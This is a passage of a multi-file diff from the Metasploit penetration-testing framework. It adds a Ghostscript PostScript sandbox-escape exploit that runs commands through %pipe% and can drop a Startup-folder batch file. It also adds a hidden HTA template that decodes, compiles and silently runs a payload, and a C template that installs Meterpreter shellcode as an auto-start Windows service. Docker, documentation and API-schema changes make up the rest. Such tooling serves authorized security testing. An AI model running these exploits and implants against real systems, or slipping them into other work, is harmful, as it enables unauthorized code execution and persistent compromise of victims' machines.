% properties in your pagedevice, like a nonsense resolution.
|
||||
%
|
||||
% Normally it would be something like [72.0 72.0], but you can't just def
|
||||
% HWResolution to something else (for example), because it's readonly:
|
||||
%
|
||||
% GS>currentpagedevice wcheck ==
|
||||
% false
|
||||
%
|
||||
% But you can just put or astore into it, because the array itself is writable:
|
||||
% GS>currentpagedevice /HWResolution get wcheck ==
|
||||
% true
|
||||
%
|
||||
% Lets just put some junk in there.
|
||||
currentpagedevice /HWResolution get 0 (foobar) put
|
||||
|
||||
% This grestore will fail, stopped just catches the error instead of aborting.
|
||||
{ grestore } stopped pop
|
||||
|
||||
% Now LockSafetyParams will be incorrectly unset, you can check like this:
|
||||
% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get == pop
|
||||
% false
|
||||
|
||||
% We can change and configure devices now, so make sure we're using one with
|
||||
% a OutputFile property.
|
||||
(ppmraw) selectdevice
|
||||
|
||||
% Check if we're on Windows or UNIX
|
||||
iswindows {
|
||||
% This is Windows, gswin32c.exe supports %pipe%, so you can just run calc.exe.
|
||||
%
|
||||
% The graphical version doesn't seem to support %pipe%, but you can create
|
||||
% arbitrary files. If something is using the api (gs32dll.dll), it may or
|
||||
% may not support %pipe%.
|
||||
|
||||
/getstartupdirwindows {
|
||||
% This figures out startup location from %TEMP% (Tested on Win10)
|
||||
(C:\\USERS\\XXXXXX~1\\STARTM~1\\PROGRAMS\\STARTUP\\)
|
||||
dup 0 null (w) .tempfile closefile 0 18 getinterval putinterval
|
||||
} def
|
||||
|
||||
% (directory) (extension) randfile (result)
|
||||
/randfile {
|
||||
% pick a random filename
|
||||
exch rand 32 string cvs concatstrings exch concatstrings
|
||||
} def
|
||||
|
||||
mark /OutputFile (%pipe%calc.exe) currentdevice putdeviceprops
|
||||
|
||||
% if you need to create files, use txtwrite like this:
|
||||
|
||||
%mark /OutputFile getstartupdirwindows (.bat) randfile
|
||||
% { (txtwrite) selectdevice } stopped pop putdeviceprops setdevice
|
||||
%0 0 moveto
|
||||
%(REM This is an exploit demo\n) show
|
||||
%(calc.exe\n) show
|
||||
} {
|
||||
% This is UNIX, just run a shell command
|
||||
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
|
||||
} ifelse
|
||||
|
||||
{ showpage } stopped pop
|
||||
|
||||
quit
|
|
@ -0,0 +1,151 @@
|
|||
<html>
|
||||
<head>
|
||||
<HTA:APPLICATION WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
|
||||
</head>
|
||||
</html>
|
||||
<script>
|
||||
window.resizeTo(1, 1);
|
||||
window.moveTo(-2000, -2000);
|
||||
// Base64 implementation found on http://www.webtoolkit.info/javascript-base64.html
|
||||
// variable names changed to make obfuscation easier
|
||||
var Base64 = {
|
||||
// private property
|
||||
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
|
||||
|
||||
// public method for decoding
|
||||
decode : function (input) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3;
|
||||
var enc1, enc2, enc3, enc4;
|
||||
var i = 0;
|
||||
|
||||
input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
|
||||
|
||||
while (i < input.length) {
|
||||
|
||||
enc1 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc2 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc3 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc4 = this._keyStr.indexOf(input.charAt(i++));
|
||||
|
||||
chr1 = (enc1 << 2) | (enc2 >> 4);
|
||||
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
|
||||
chr3 = ((enc3 & 3) << 6) | enc4;
|
||||
|
||||
output = output + String.fromCharCode(chr1);
|
||||
|
||||
if (enc3 != 64) {
|
||||
output = output + String.fromCharCode(chr2);
|
||||
}
|
||||
if (enc4 != 64) {
|
||||
output = output + String.fromCharCode(chr3);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
output = Base64._utf8_decode(output);
|
||||
|
||||
return output;
|
||||
|
||||
},
|
||||
_utf8_decode : function (utftext) {
|
||||
var string = "";
|
||||
var input_idx = 0;
|
||||
var chr1 = 0;
|
||||
var chr2 = 0;
|
||||
var chr3 = 0;
|
||||
|
||||
while ( input_idx < utftext.length ) {
|
||||
|
||||
chr1 = utftext.charCodeAt(input_idx);
|
||||
|
||||
if (chr1 < 128) {
|
||||
string += String.fromCharCode(chr1);
|
||||
input_idx++;
|
||||
}
|
||||
else if((chr1 > 191) && (chr1 < 224)) {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
|
||||
input_idx += 2;
|
||||
} else {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
chr3 = utftext.charCodeAt(input_idx+2);
|
||||
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
|
||||
input_idx += 3;
|
||||
}
|
||||
}
|
||||
|
||||
return string;
|
||||
}
|
||||
|
||||
};
|
||||
|
||||
decodedStr = Base64.decode("<%= jsnet_encoded %>");
|
||||
|
||||
function getTempPath()
|
||||
{
|
||||
var TemporaryFolder = 2;
|
||||
|
||||
var fso = new ActiveXObject("Scripting.FileSystemObject");
|
||||
var tempPath = fso.GetSpecialFolder(TemporaryFolder);
|
||||
|
||||
return tempPath;
|
||||
}
|
||||
|
||||
var path = getTempPath();
|
||||
|
||||
function makefile()
|
||||
{
|
||||
var fso = new ActiveXObject("Scripting.FileSystemObject");
|
||||
var thefile = fso.CreateTextFile(path + "\\\\<%= fname %>.js", true);
|
||||
|
||||
thefile.WriteLine(decodedStr);
|
||||
thefile.Close();
|
||||
}
|
||||
|
||||
makefile();
|
||||
|
||||
function findJSC()
|
||||
{
|
||||
var fso = new ActiveXObject("Scripting.FileSystemObject");
|
||||
var comPath = "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\";
|
||||
var jscPath = "";
|
||||
|
||||
if(!fso.FolderExists(comPath))
|
||||
{
|
||||
return false;
|
||||
}
|
||||
|
||||
var frameFolder = fso.GetFolder(comPath);
|
||||
var fEnum = new Enumerator(frameFolder.SubFolders);
|
||||
|
||||
while(!fEnum.atEnd())
|
||||
{
|
||||
jscPath = fEnum.item().Path;
|
||||
|
||||
if(fso.FileExists(jscPath + "\\\\jsc.exe"))
|
||||
{
|
||||
return jscPath + "\\\\jsc.exe";
|
||||
}
|
||||
|
||||
fEnum.moveNext();
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
var comPath = findJSC();
|
||||
if(comPath)
|
||||
{
|
||||
var fso = new ActiveXObject("Scripting.FileSystemObject");
|
||||
var objShell = new ActiveXObject("WScript.shell");
|
||||
var js_f = path + "\\\\<%= fname %>.js";
|
||||
var ex = path + "\\\\<%= fname %>.exe";
|
||||
var platform = "/platform:<%= arch %>";
|
||||
|
||||
objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
|
||||
while(!fso.FileExists(ex)) { }
|
||||
|
||||
objShell.run(ex, 0);
|
||||
}
|
||||
</script>
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,304 @@
|
|||
#include <String.h>
|
||||
#include <Windows.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define SERVICE_NAME <%= @service_name.inspect %>
|
||||
#define DISPLAY_NAME <%= @service_description.inspect %>
|
||||
#define RETRY_TIME <%= @retry_time %>
|
||||
|
||||
//
|
||||
// Globals
|
||||
//
|
||||
|
||||
SERVICE_STATUS status;
|
||||
SERVICE_STATUS_HANDLE hStatus;
|
||||
|
||||
//
|
||||
// Meterpreter connect back to host
|
||||
//
|
||||
|
||||
void start_meterpreter()
|
||||
{
|
||||
// Your meterpreter shell here
|
||||
<%= buf %>
|
||||
|
||||
LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
memcpy(buffer,buf,sizeof(buf));
|
||||
HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
|
||||
WaitForSingleObject(hThread, -1); //INFINITE
|
||||
CloseHandle(hThread);
|
||||
}
|
||||
|
||||
//
|
||||
// Call self without parameter to start meterpreter
|
||||
//
|
||||
|
||||
void self_call()
|
||||
{
|
||||
char path[MAX_PATH];
|
||||
char cmd[MAX_PATH];
|
||||
|
||||
if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
|
||||
// Get module file name failed
|
||||
return;
|
||||
}
|
||||
|
||||
STARTUPINFO startup_info;
|
||||
PROCESS_INFORMATION process_information;
|
||||
|
||||
ZeroMemory(&startup_info, sizeof(startup_info));
|
||||
startup_info.cb = sizeof(startup_info);
|
||||
|
||||
ZeroMemory(&process_information, sizeof(process_information));
|
||||
|
||||
// If create process failed.
|
||||
// CREATE_NO_WINDOW = 0x08000000
|
||||
if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
|
||||
NULL, &startup_info, &process_information) == 0)
|
||||
{
|
||||
return;
|
||||
}
|
||||
|
||||
// Wait until the process died.
|
||||
WaitForSingleObject(process_information.hProcess, -1);
|
||||
}
|
||||
|
||||
//
|
||||
// Process control requests from the Service Control Manager
|
||||
//
|
||||
|
||||
VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
|
||||
{
|
||||
switch (fdwControl) {
|
||||
case SERVICE_CONTROL_STOP:
|
||||
case SERVICE_CONTROL_SHUTDOWN:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_STOPPED;
|
||||
break;
|
||||
|
||||
case SERVICE_CONTROL_PAUSE:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_PAUSED;
|
||||
break;
|
||||
|
||||
case SERVICE_CONTROL_CONTINUE:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_RUNNING;
|
||||
break;
|
||||
|
||||
default:
|
||||
break;
|
||||
}
|
||||
|
||||
if (SetServiceStatus(hStatus, &status) == 0) {
|
||||
//printf("Cannot set service status (0x%08x)", GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Main function of service
|
||||
//
|
||||
|
||||
VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
|
||||
{
|
||||
// Register the service handler
|
||||
|
||||
hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
|
||||
|
||||
if (hStatus == 0) {
|
||||
//printf("Cannot register service handler (0x%08x)", GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Initialize the service status structure
|
||||
|
||||
status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
|
||||
status.dwCurrentState = SERVICE_RUNNING;
|
||||
status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwServiceSpecificExitCode = 0;
|
||||
status.dwCheckPoint = 0;
|
||||
status.dwWaitHint = 0;
|
||||
|
||||
if (SetServiceStatus(hStatus, &status) == 0) {
|
||||
//printf("Cannot set service status (0x%08x)", GetLastError());
|
||||
return;
|
||||
}
|
||||
|
||||
// Start the Meterpreter
|
||||
while (status.dwCurrentState == SERVICE_RUNNING) {
|
||||
self_call();
|
||||
Sleep(RETRY_TIME);
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Installs and starts the Meterpreter service
|
||||
//
|
||||
|
||||
BOOL install_service()
|
||||
{
|
||||
SC_HANDLE hSCManager;
|
||||
SC_HANDLE hService;
|
||||
|
||||
char path[MAX_PATH];
|
||||
|
||||
// Get the current module name
|
||||
|
||||
if (!GetModuleFileName(NULL, path, MAX_PATH)) {
|
||||
//printf("Cannot get module name (0x%08x)", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Build the service command line
|
||||
|
||||
|
||||
char cmd[MAX_PATH];
|
||||
|
||||
int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
|
||||
if (total_len < 0 || total_len >= sizeof(cmd)){
|
||||
//printf("Cannot build service command line (0x%08x)", -1);
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
cmd[0] = '\0';
|
||||
strcat(cmd, "\"");
|
||||
strcat(cmd, path);
|
||||
strcat(cmd, "\" <%= @start_cmd %>");
|
||||
|
||||
// Open the service manager
|
||||
|
||||
hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
|
||||
|
||||
if (hSCManager == NULL) {
|
||||
//printf("Cannot open service manager (0x%08x)", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Create the service
|
||||
|
||||
hService = CreateService(
|
||||
hSCManager,
|
||||
SERVICE_NAME,
|
||||
DISPLAY_NAME,
|
||||
0xf01ff, // SERVICE_ALL_ACCESS
|
||||
SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
|
||||
SERVICE_AUTO_START,
|
||||
SERVICE_ERROR_NORMAL,
|
||||
cmd,
|
||||
NULL,
|
||||
NULL,
|
||||
NULL,
|
||||
NULL, /* LocalSystem account */
|
||||
NULL
|
||||
);
|
||||
|
||||
if (hService == NULL) {
|
||||
//printf("Cannot create service (0x%08x)", GetLastError());
|
||||
|
||||
CloseServiceHandle(hSCManager);
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Start the service
|
||||
|
||||
char* args[] = { path, "service" };
|
||||
|
||||
if (StartService(hService, 2, (const char**)&args) == 0) {
|
||||
DWORD err = GetLastError();
|
||||
|
||||
if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
|
||||
{
|
||||
//printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
|
||||
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCManager);
|
||||
return FALSE;
|
||||
}
|
||||
}
|
||||
|
||||
// Cleanup
|
||||
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCManager);
|
||||
|
||||
//printf("Service %s successfully installed.", SERVICE_NAME);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
//
|
||||
// Start the service
|
||||
//
|
||||
|
||||
void start_service()
|
||||
{
|
||||
SERVICE_TABLE_ENTRY ServiceTable[] =
|
||||
{
|
||||
{ SERVICE_NAME, &ServiceMain },
|
||||
{ NULL, NULL }
|
||||
};
|
||||
|
||||
if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
|
||||
//printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Main function
|
||||
//
|
||||
|
||||
int main()
|
||||
{
|
||||
// Parse the command line argument.
|
||||
// For now, int main(int argc, char *argv) is buggy with metasm.
|
||||
// So we choose this approach to achieve it.
|
||||
LPTSTR cmdline;
|
||||
cmdline = GetCommandLine();
|
||||
|
||||
char *argv[MAX_PATH];
|
||||
char * ch = strtok(cmdline," ");
|
||||
int argc = 0;
|
||||
|
||||
while (ch != NULL)
|
||||
{
|
||||
argv[argc] = malloc( strlen(ch)+1) ;
|
||||
strncpy(argv[argc], ch, strlen(ch)+1);
|
||||
|
||||
ch = strtok (NULL, " ");
|
||||
argc++;
|
||||
}
|
||||
|
||||
if (argc > 1) {
|
||||
|
||||
if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
|
||||
|
||||
// Installs and starts the service
|
||||
|
||||
install_service();
|
||||
return 0;
|
||||
}
|
||||
else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
|
||||
// Starts the Meterpreter as a service
|
||||
|
||||
start_service();
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
|
||||
// Starts the Meterpreter as a normal application
|
||||
|
||||
start_meterpreter();
|
||||
|
||||
return 0;
|
||||
}
|
Binary file not shown.
Binary file not shown.
|
@ -252,6 +252,16 @@ typedef struct _OVERLAPPED {
|
|||
} OVERLAPPED, *LPOVERLAPPED;
|
||||
|
||||
typedef DWORD SERVICE_STATUS_HANDLE;
|
||||
typedef VOID(WINAPI *LPHANDLER_FUNCTION)(DWORD);
|
||||
|
||||
typedef void (WINAPI *LPSERVICE_MAIN_FUNCTION)(DWORD,LPSTR*);
|
||||
|
||||
typedef struct _SERVICE_TABLE_ENTRY {
|
||||
LPSTR lpServiceName;
|
||||
LPSERVICE_MAIN_FUNCTION lpServiceProc;
|
||||
} SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
|
||||
|
||||
typedef SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
|
||||
|
||||
typedef enum _SC_ENUM_TYPE {
|
||||
SC_ENUM_PROCESS_INFO = 0
|
||||
|
@ -540,3 +550,6 @@ WINAPI BOOL IsDebuggerPresent __attribute__((dllimport))(void);
|
|||
WINAPI BOOL CheckRemoteDebuggerPresent __attribute__((dllimport))(HANDLE, PBOOL);
|
||||
WINAPI NTSTATUS NtQueryInformationProcess __attribute__((dllimport))(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
|
||||
WINAPI void SetLastError __attribute__((dllimport))(DWORD);
|
||||
WINAPI SERVICE_STATUS_HANDLE RegisterServiceCtrlHandler __attribute__((dllimport))(LPCSTR, LPHANDLER_FUNCTION);
|
||||
BOOL WINAPI StartServiceCtrlDispatcher __attribute__((dllimport))(LPSERVICE_TABLE_ENTRY);
|
||||
LPTSTR WINAPI GetCommandLine __attribute__((dllimport))(void);
|
||||
|
|
|
@ -44,3 +44,5 @@ int system(const char*);
|
|||
long int labs(long int);
|
||||
div_t div(int, int);
|
||||
ldiv_t ldiv(long int, long int);
|
||||
void* malloc (size_t size);
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
%clr
|
||||
______________________________________________________________________________
|
||||
| |
|
||||
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|
||||
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V5%clr |
|
||||
|______________________________________________________________________________|
|
||||
%yel\%clr %yel/%clr %yel/%clr
|
||||
%yel\%clr . %yel/%clr %yel/%clr x
|
||||
|
@ -25,6 +25,6 @@
|
|||
#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
|
||||
################################################################################
|
||||
################################################################################
|
||||
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
|
||||
# %bldWAVE 5%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
|
||||
################################################################################
|
||||
https://metasploit.com%clr
|
||||
|
|
|
@ -14,10 +14,22 @@
|
|||
<%= normalize_platforms(items[:mod_platforms]) %>
|
||||
<% end %>
|
||||
|
||||
## Reliability
|
||||
## Module Ranking
|
||||
|
||||
<%= normalize_rank(items[:mod_rank]) %>
|
||||
|
||||
## Side Effects
|
||||
|
||||
<%= normalize_side_effects(items[:mod_side_effects]) %>
|
||||
|
||||
## Reliability
|
||||
|
||||
<%= normalize_reliability(items[:mod_reliability]) %>
|
||||
|
||||
## Stability
|
||||
|
||||
<%= normalize_stability(items[:mod_stability]) %>
|
||||
|
||||
## Related Pull Requests
|
||||
|
||||
<%= normalize_pull_requests(items[:mod_pull_requests]) %>
|
||||
|
|
|
@ -0,0 +1,6 @@
|
|||
```
|
||||
msf > use <%= mod.fullname %>
|
||||
msf <%= mod.type %>(<%= mod.shortname %>) > show options
|
||||
... show and set options ...
|
||||
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
|
||||
```
|
|
@ -86241,6 +86241,7 @@ wharves
|
|||
what
|
||||
whatchamacallit
|
||||
whatever
|
||||
whatevers2009
|
||||
whatley
|
||||
whatnot
|
||||
whatshername
|
||||
|
|
|
@ -16,6 +16,7 @@ bin
|
|||
checkfs
|
||||
checkfsys
|
||||
checksys
|
||||
chronos
|
||||
cmwlogin
|
||||
couchdb
|
||||
daemon
|
||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -9,6 +9,6 @@ services:
|
|||
BUNDLER_ARGS: --jobs=8
|
||||
image: metasploit:dev
|
||||
environment:
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf_dev
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf_dev?pool=200&timeout=5
|
||||
volumes:
|
||||
- .:/usr/src/metasploit-framework
|
||||
|
|
|
@ -3,14 +3,13 @@ services:
|
|||
ms:
|
||||
image: metasploitframework/metasploit-framework:latest
|
||||
environment:
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf?pool=200&timeout=5
|
||||
links:
|
||||
- db
|
||||
ports:
|
||||
- 4444:4444
|
||||
volumes:
|
||||
- $HOME/.msf4:/home/msf/.msf4
|
||||
- /etc/localtime:/etc/localtime:ro
|
||||
|
||||
db:
|
||||
image: postgres:10-alpine
|
||||
|
|
|
@ -0,0 +1,5 @@
|
|||
development: &pgsql
|
||||
url: <%= ENV['DATABASE_URL'] %>
|
||||
|
||||
production: &production
|
||||
<<: *pgsql
|
|
@ -5,16 +5,27 @@ MSF_GROUP=msf
|
|||
TMP=${MSF_UID:=1000}
|
||||
TMP=${MSF_GID:=1000}
|
||||
|
||||
# don't recreate system users like root
|
||||
if [ "$MSF_UID" -lt "1000" ]; then
|
||||
MSF_UID=1000
|
||||
# if the user starts the container as root or another system user,
|
||||
# don't use a low privileged user as we mount the home directory
|
||||
if [ "$MSF_UID" -eq "0" ]; then
|
||||
"$@"
|
||||
else
|
||||
# if the users group already exists, create a random GID, otherwise
|
||||
# reuse it
|
||||
if ! grep ":$MSF_GID:" /etc/group > /dev/null; then
|
||||
addgroup -g $MSF_GID $MSF_GROUP
|
||||
else
|
||||
addgroup $MSF_GROUP
|
||||
fi
|
||||
|
||||
# check if user id already exists
|
||||
if ! grep ":$MSF_UID:" /etc/passwd > /dev/null; then
|
||||
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
|
||||
# add user to metasploit group so it can read the source
|
||||
addgroup $MSF_USER $METASPLOIT_GROUP
|
||||
su-exec $MSF_USER "$@"
|
||||
# fall back to root exec if the user id already exists
|
||||
else
|
||||
"$@"
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ "$MSF_GID" -lt "1000" ]; then
|
||||
MSF_GID=1000
|
||||
fi
|
||||
|
||||
addgroup -g $MSF_GID $MSF_GROUP
|
||||
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
|
||||
|
||||
su-exec $MSF_USER "$@"
|
||||
|
|
|
@ -0,0 +1,66 @@
|
|||
require 'swagger/blocks'
|
||||
|
||||
module AuthApiDoc
|
||||
include Swagger::Blocks
|
||||
|
||||
MESSAGE_DESC = 'The status of the authentication request.'
|
||||
MESSAGE_EXAMPLE = 'Generated new API token.'
|
||||
TOKEN_DESC = 'The Authentication Bearer token'
|
||||
TOKEN_EXAMPLE = '899d2f45e12429d07427230289400a4594bcffe32169ebb826b4ffa9b90e1d1586f15fa42f069bb7'
|
||||
|
||||
# Swagger documentation for auth model
|
||||
swagger_schema :Auth do
|
||||
property :message, type: :string, description: MESSAGE_DESC, example: MESSAGE_EXAMPLE
|
||||
property :token, type: :string, description: TOKEN_DESC, example: TOKEN_EXAMPLE
|
||||
end
|
||||
|
||||
swagger_path '/api/v1/auth/generate-token' do
|
||||
# Swagger documentation for /api/v1/auth/generate-token GET
|
||||
operation :get do
|
||||
|
||||
key :description, 'Return a valid Authorization Bearer token.'
|
||||
key :tags, [ 'auth' ]
|
||||
|
||||
parameter do
|
||||
key :name, :username
|
||||
key :in, :query
|
||||
key :description, 'The username for the user you want to authenticate.'
|
||||
key :required, true
|
||||
key :type, :string
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :password
|
||||
key :in, :query
|
||||
key :description, 'The password for the user you want to authenticate.'
|
||||
key :required, true
|
||||
key :type, :string
|
||||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Returns a valid auth token.'
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Auth
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, 'Invalid username or password. ' + RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -33,6 +33,11 @@ module CredentialApiDoc
|
|||
DATA_EXAMPLE = "'password123', '$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1', or '$NT$7f8fe03093cc84b267b109625f6bbf4b'"
|
||||
JTR_FORMAT_DESC = 'Comma-separated list of the formats for John the ripper to use to try and crack this.'
|
||||
JTR_FORMAT_EXAMPLE = 'md5,des,bsdi,crypt'
|
||||
KEY_DESC = 'The name of the key for the realm.'
|
||||
KEY_EXAMPLE = 'Active Directory Domain'
|
||||
VALUE_DESC = 'The value of the key for the realm.'
|
||||
VALUE_EXAMPLE = 'contoso.com'
|
||||
|
||||
PUBLIC_TYPE_ENUM = [ 'Metasploit::Credential::BlankUsername', 'Metasploit::Credential::Username' ]
|
||||
PRIVATE_TYPE_CLASS_ENUM = [
|
||||
'Metasploit::Credential::ReplayableHash',
|
||||
|
@ -108,6 +113,15 @@ module CredentialApiDoc
|
|||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
swagger_schema :Realm do
|
||||
key :required, [:key, :value]
|
||||
property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
|
||||
property :key, type: :string, description: KEY_DESC, example: KEY_EXAMPLE
|
||||
property :value, type: :string, description: VALUE_DESC, example: VALUE_EXAMPLE
|
||||
property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
|
||||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
swagger_path '/api/v1/credentials' do
|
||||
# Swagger documentation for /api/v1/credentials GET
|
||||
operation :get do
|
||||
|
@ -167,8 +181,15 @@ module CredentialApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -190,6 +211,8 @@ module CredentialApiDoc
|
|||
property :username, type: :string, description: USERNAME_DESC, example: USERNAME_EXAMPLE
|
||||
property :private_data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
|
||||
property :private_type, type: :string, description: PRIVATE_TYPE_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :realm_key, type: :string, description: KEY_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :realm_value, type: :string, description: VALUE_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :jtr_format, type: :string, description: JTR_FORMAT_DESC, example: JTR_FORMAT_EXAMPLE
|
||||
property :address, type: :string, format: :ipv4, required: true, description: ADDRESS_DESC, example: ADDRESS_EXAMPLE
|
||||
property :port, type: :int32, format: :int32, description: PORT_DESC, example: PORT_EXAMPLE
|
||||
|
@ -204,7 +227,7 @@ module CredentialApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Credential
|
||||
|
@ -212,8 +235,15 @@ module CredentialApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -237,8 +267,15 @@ module CredentialApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -274,8 +311,15 @@ module CredentialApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
